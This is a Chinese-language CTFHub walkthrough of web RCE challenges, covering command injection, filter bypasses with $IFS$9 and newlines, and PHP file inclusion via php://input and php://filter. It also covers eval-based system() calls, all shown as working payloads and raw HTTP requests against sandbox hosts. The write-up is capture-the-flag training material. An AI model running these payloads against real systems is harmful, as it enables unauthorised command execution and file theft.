[CTFHub] Web RCE Write ups
目录
- 命令注入
- 过滤cat
- 过滤空格
- 过滤目录分隔符
- 过滤运算符
- 命令注入-综合练习
- 文件包含
- php://input
- 远程包含
- 读取源代码
- eval执行
命令注入
输入
127.0.0.1 | ls -al
查看文件
127.0.0.1 | cat [flag文件名]
过滤cat
用less more就行
过滤空格
用
$IFS$9
代替空格,然后输入
127.0.0.1|cat$IFS$9lag_3760913111752.php
过滤目录分隔符
127.0.0.1;cd flag_is_here;cat flag_11132792223723.php
过滤运算符
127.0.0.1;cat flag_209472690126349.php
命令注入-综合练习
先输入这个显示flag文件所在位置,注意把flag写成通配符
http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0als$IFS$9-al
最后答案
http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0amore$IFS$9fla*_8941778912527.php
文件包含
这道题get与post结合起来
get如下
http://challenge-647375ee75c1e32b.sandbox.ctfhub.com:10080/?file=shell.txt
post如下
ctfhub=system("cat /flag");
参考文章:
https://blog.csdn.net/Xxy605/article/details/107556509
https://winny.work/ctfhub技能树_web_rce之eval、文件包含/680.html
查找flag
find / -name flag*
php://input
用burp拦截,发送到Repeater,然后构造post请求
POST /?file=php://input HTTP/1.1
Host: challenge-b6e75eaa899f147c.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 38<?php system('find / -name *flag*');?>
找到flag文件,输出
证明是可以使用php://input
远程包含
这里POST与GET都可以,为什么呢?
GET /?file=php://input HTTP/1.1
Host: challenge-4c672ad46ce5abfc.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29<?php system('cat /flag*');?>
读取源代码
POST /?file=php://filter/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0
另外一种答案
POST /?file=php://filter/read=convert.base64-encode/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0
eval执行
http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("find / -name *flag*");
找到flag文件
http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("cat /flag_29995");
[CTFHub] Web RCE Write ups相关推荐
- Ctfhub解题 web RCE
Ctfhub解题 web RCE 1. eval执行 2.文件包含 3.php://input 4.读取源代码 5.远程包含 6.命令注入 7.过滤cat 8.过滤空格 9.过滤目录分隔符 10.过滤 ...
- CTFHub——Web技能树
文章目录 信息泄露 目录遍历 PHPINFO 备份文件下载 Git泄露 SVN泄露 HG泄露 SQL注入 整型注入 字符型注入 报错注入 布尔盲注 时间盲注 MySQL结构 cookie注入 UA注入 ...
- CTFHub web 文件上传- 无限制
CTFHub 文件上传 - 无限制 上传一个含一句话木马的.jpg文件,抓包后将.jpg改为.php后上传,go一下即可 然后再之前的路径后面加上upload/.php的路径,就可以了 这是我们上传的 ...
- CTFHub Web真题(7星)
文章目录 七星难度 SQL注入-2(字符布尔盲注) namp(nmap命令注入) shrine(Jinja SSTI) Web1(sql注入过滤) easy_login(nodejs JWT攻击) 七 ...
- APC UPS电源管理在机房的应用
在日常工作中,我们有过突然断电造成工作中断的经历,让人很懊恼,如果提前做准备,那么会减少很大损失.在服务器操作系统中都有电源管理的选项,服务器可以通过串口跟UPS连接,对UPS进行管理,查看工作日志, ...
- 第十届极客大挑战——部分web和RE的WP
第十届极客大挑战--部分web和RE的WP 昨天刚刚搞完湖湘杯和软考,累的一批,,,,湖湘杯的wp就不写了,写写这个wp 这个好像是一个月之前就开始的,打了一个月,不断的放题,题也做了不少,,, 其他 ...
- 主机端的入侵检测,难啃到让人想放弃!
青藤云安全,江湖人称"藤厂",凭借领先的理念.技术和产品在网络安全圈逐步封神,久战而立于不败之地.为了让更多人了解青藤.了解网络安全,笔者特开通此专栏,争取用简洁明了的语言讲清楚晦 ...
- Linux(CentOS)下,各种协议,端口号
Linux(CentOS)下,各种配置文件如下: DNS:cat /etc/resolv.conf 主机名:cat etc/sysconfig/network 私有主机名:cat /etc/hosts ...
- 一、CTF-Web-信息泄露(记录CTF学习)
目录 1.源码泄露 1-1.页面源代码泄露 1-2.敏感文件泄露 1-2-1.备份(.swp/.bak/.beifen/~/phps等) 1-2-2.数据库(mdb) 1-2-3.压缩包(zip/ta ...
- xss平台详解及练习
文章目录 xss平台使用教程 练习 CTFhub web 反射型xss XSS平台 xss平台使用教程 xss平台使用教程 练习 CTFhub web 反射型xss 在第一栏处输入测试语句 <s ...
最新文章
- lr java脚本_【上海校区】 LR Java脚本编写方法
- java javadoc_使用Java 9向Javadoc搜索添加术语
- LeetCode 348. 判定井字棋胜负(计数)
- 电脑硬件检测_【学无止境】电脑硬件维修测试学习资料(附送各类PC检修资源)...
- c++101rule
- Spring Boot 揭秘与实战(二) 数据缓存篇 - Guava Cache
- vba自动生成html,动态生成嵌入在VBA电子邮件生成中的HTML表
- 实现带有拉普拉斯修正的朴素贝叶斯_数据科学 | 算法工程师必备的机器学习贝叶斯分类器...
- 计算机更换硬盘键盘鼠标不好使,安装win7时鼠标键盘不能用怎么办?(完美解决方法)...
- 主存空间的分配和回收实验报告
- Android 仿QQ好友列表功能实现
- PM应具备的规划技巧-顾客价值管理
- 石溪分校 计算机研究生专业,纽约州立石溪分校 - 985本科申请纽约州立大学石溪分校计算机研究生容易吗?要准备什么?还有如果成功了好毕业吗??...
- 【跨域】一篇文章彻底解决跨域设置cookie问题!
- 什么是stub文件_stub code
- IntelliJ idea (最新版)激活方法
- 计算机鼠标游戏教学法,小学信息技术游戏型教学法初探
- php获取网卡网速,Golang 获取网卡时时带宽,可用于测速
- Java从零开始实现导出excel(一)
- uedit php,laravel uedit上传oss
热门文章
- python 人民币兑美元汇率_人民币汇率转换(python人民币和美元转换)
- unity利用帧动画制作特效
- echarts 实现晶体球面投影
- 基于蓝墨云班课的翻转课堂实践
- element技巧之element的dialog弹出框可拖拽、可拉伸、可全屏并处理边界问题
- 水晶报表的宽度调整方法(设计器、代码调整、rpt文件属性)
- 如何检查有哪些尝试入侵服务器IP?有哪些命令?
- 2021最新调查报告来了!揭露中国程序员工作和生活真实现状
- 用心成就精品海天讲述不一样的品牌故事
- android手机内存单位 吉字节,Android8.1 吉字节问题